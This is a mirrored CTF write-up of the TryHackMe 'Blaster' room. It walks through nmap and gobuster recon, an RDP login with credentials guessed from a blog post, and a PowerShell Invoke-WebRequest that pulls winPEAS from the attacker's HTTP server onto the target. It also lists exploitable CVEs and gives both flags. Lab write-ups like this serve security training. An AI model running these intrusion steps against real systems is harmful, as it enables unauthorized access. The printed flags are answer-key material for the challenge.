mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-14 00:07:14 +00:00
211 lines
No EOL
9.3 KiB
Markdown
211 lines
No EOL
9.3 KiB
Markdown
# TryHackMe-Blaster CTF
|
||
|
||
>Abdullah Rizwan | 17th September , 06:19 PM
|
||
|
||
|
||
## NMAP
|
||
|
||
```
|
||
export IP=10.10.74.61
|
||
|
||
```
|
||
|
||
Now we want to scan all ports that are open on the box so for this we are going to use `-p-` ports `-A` aggressive scan to look for all ports `-T4` is the speed of the result and `$IP` is IP variable.
|
||
|
||
```
|
||
nmap -p- -A -T4 $IP
|
||
```
|
||
|
||
```
|
||
Host is up (0.22s latency).
|
||
Not shown: 65520 closed ports
|
||
PORT STATE SERVICE VERSION
|
||
80/tcp open http Microsoft IIS httpd 10.0
|
||
| http-methods:
|
||
|_ Potentially risky methods: TRACE
|
||
|_http-server-header: Microsoft-IIS/10.0
|
||
|_http-title: IIS Windows Server
|
||
135/tcp open msrpc Microsoft Windows RPC
|
||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|
||
3306/tcp open mysql MySQL (unauthorized)
|
||
3389/tcp open ms-wbt-server Microsoft Terminal Services
|
||
| rdp-ntlm-info:
|
||
| Target_Name: RETROWEB
|
||
| NetBIOS_Domain_Name: RETROWEB
|
||
| NetBIOS_Computer_Name: RETROWEB
|
||
| DNS_Domain_Name: RetroWeb
|
||
| DNS_Computer_Name: RetroWeb
|
||
| Product_Version: 10.0.14393
|
||
|_ System_Time: 2020-09-17T13:37:30+00:00
|
||
| ssl-cert: Subject: commonName=RetroWeb
|
||
| Not valid before: 2020-05-21T21:44:38
|
||
|_Not valid after: 2020-11-20T21:44:38
|
||
|_ssl-date: 2020-09-17T13:37:36+00:00; -1s from scanner time.
|
||
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||
|_http-title: Not Found
|
||
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||
|_http-title: Not Found
|
||
49664/tcp open msrpc Microsoft Windows RPC
|
||
49665/tcp open msrpc Microsoft Windows RPC
|
||
49666/tcp open msrpc Microsoft Windows RPC
|
||
49667/tcp open msrpc Microsoft Windows RPC
|
||
49669/tcp open msrpc Microsoft Windows RPC
|
||
49670/tcp open msrpc Microsoft Windows RPC
|
||
49678/tcp open msrpc Microsoft Windows RPC
|
||
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||
TCP/IP fingerprint:
|
||
OS:SCAN(V=7.80%E=4%D=9/17%OT=80%CT=1%CU=33259%PV=Y%DS=2%DC=T%G=Y%TM=5F6366A
|
||
OS:A)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5
|
||
OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
|
||
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
|
||
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
|
||
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
|
||
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
|
||
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
|
||
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
|
||
OS:N%T=80%CD=Z)
|
||
|
||
Network Distance: 2 hops
|
||
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
|
||
|
||
Host script results:
|
||
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|
||
| smb-security-mode:
|
||
| authentication_level: user
|
||
| challenge_response: supported
|
||
|_ message_signing: disabled (dangerous, but default)
|
||
| smb2-security-mode:
|
||
| 2.02:
|
||
|_ Message signing enabled but not required
|
||
| smb2-time:
|
||
| date: 2020-09-17T13:37:29
|
||
|_ start_date: 2020-09-17T13:23:20
|
||
|
||
TRACEROUTE (using port 143/tcp)
|
||
HOP RTT ADDRESS
|
||
1 175.30 ms 10.8.0.1
|
||
2 228.68 ms 10.10.74.61
|
||
|
||
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||
Nmap done: 1 IP address (1 host up) scanned in 786.80 seconds
|
||
|
||
```
|
||
|
||
Web server is on http://10.10.74.61:80/
|
||
|
||
## Gobuster
|
||
|
||
```
|
||
gobuster dir -u 10.10.74.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||
===============================================================
|
||
Gobuster v3.0.1
|
||
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||
===============================================================
|
||
[+] Url: http://10.10.74.61
|
||
[+] Threads: 10
|
||
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||
[+] Status codes: 200,204,301,302,307,401,403
|
||
[+] User Agent: gobuster/3.0.1
|
||
[+] Timeout: 10s
|
||
===============================================================
|
||
2020/09/17 09:45:48 Starting gobuster
|
||
===============================================================
|
||
/retro (Status: 301)
|
||
Progress: 7068 / 220561 (3.20%)
|
||
[!] Keyboard interrupt detected, terminating.
|
||
===============================================================
|
||
2020/09/17 09:50:04 Finished
|
||
|
||
```
|
||
By visiting the directory `/retro` we will find a username `Wade`.
|
||
|
||
|
||
By going through the page we will see a post
|
||
|
||
```
|
||
Ready Player One
|
||
|
||
by Wade
|
||
|
||
I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!
|
||
|
||
```
|
||
Now by googling the name of the avatar we will find `Parzival` which is the passworrd for `Wade`.
|
||
|
||
|
||
|
||
## Remmina (RDP)
|
||
|
||
Remmina is RDP client for linux
|
||
|
||
Simply launch the application and in the username insert `wade` in password `parzival` and you will be logged into windows machine.
|
||
|
||
|
||
```
|
||
THM{HACK_PLAYER_ONE}
|
||
```
|
||
|
||
|
||
Now that we have access to the machine we can run `winPEAS` on it to do that we first need to host it on our local machine
|
||
|
||
```
|
||
python -m SimpleHTTPServer
|
||
Serving HTTP on 0.0.0.0 port 8000 ...
|
||
|
||
```
|
||
|
||
Then open powershell on target machine since `curl` isn't available.
|
||
|
||
```
|
||
Invoke-WebRequest http://10.8.94.60:8000/winPEAS.exe -O winPEAS.exe
|
||
```
|
||
And run the file.
|
||
|
||
```
|
||
[!] CVE-2019-0836 : VULNERABLE
|
||
[>] https://exploit-db.com/exploits/46718
|
||
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
|
||
|
||
[!] CVE-2019-0841 : VULNERABLE
|
||
[>] https://github.com/rogue-kdc/CVE-2019-0841
|
||
[>] https://rastamouse.me/tags/cve-2019-0841/
|
||
|
||
[!] CVE-2019-1064 : VULNERABLE
|
||
[>] https://www.rythmstick.net/posts/cve-2019-1064/
|
||
|
||
[!] CVE-2019-1130 : VULNERABLE
|
||
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
|
||
|
||
[!] CVE-2019-1253 : VULNERABLE
|
||
[>] https://github.com/padovah4ck/CVE-2019-1253
|
||
|
||
[!] CVE-2019-1315 : VULNERABLE
|
||
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
|
||
|
||
[!] CVE-2019-1385 : VULNERABLE
|
||
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg
|
||
|
||
[!] CVE-2019-1388 : VULNERABLE
|
||
[>] https://github.com/jas502n/CVE-2019-1388
|
||
|
||
[!] CVE-2019-1405 : VULNERABLE
|
||
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
|
||
|
||
```
|
||
You will see theses CVE's which are vulnerable to this machine for me internet explorer wasn't showing history so this method also works.
|
||
|
||
|
||
## Previlege Esacalation
|
||
|
||
This is the video which helps to escalate our privileges.
|
||
|
||
https://www.youtube.com/watch?v=3BQKpPNlTSo
|
||
|
||
|
||
```
|
||
THM{COIN_OPERATED_EXPLOITATION}
|
||
```
|
||
This is the root flag. |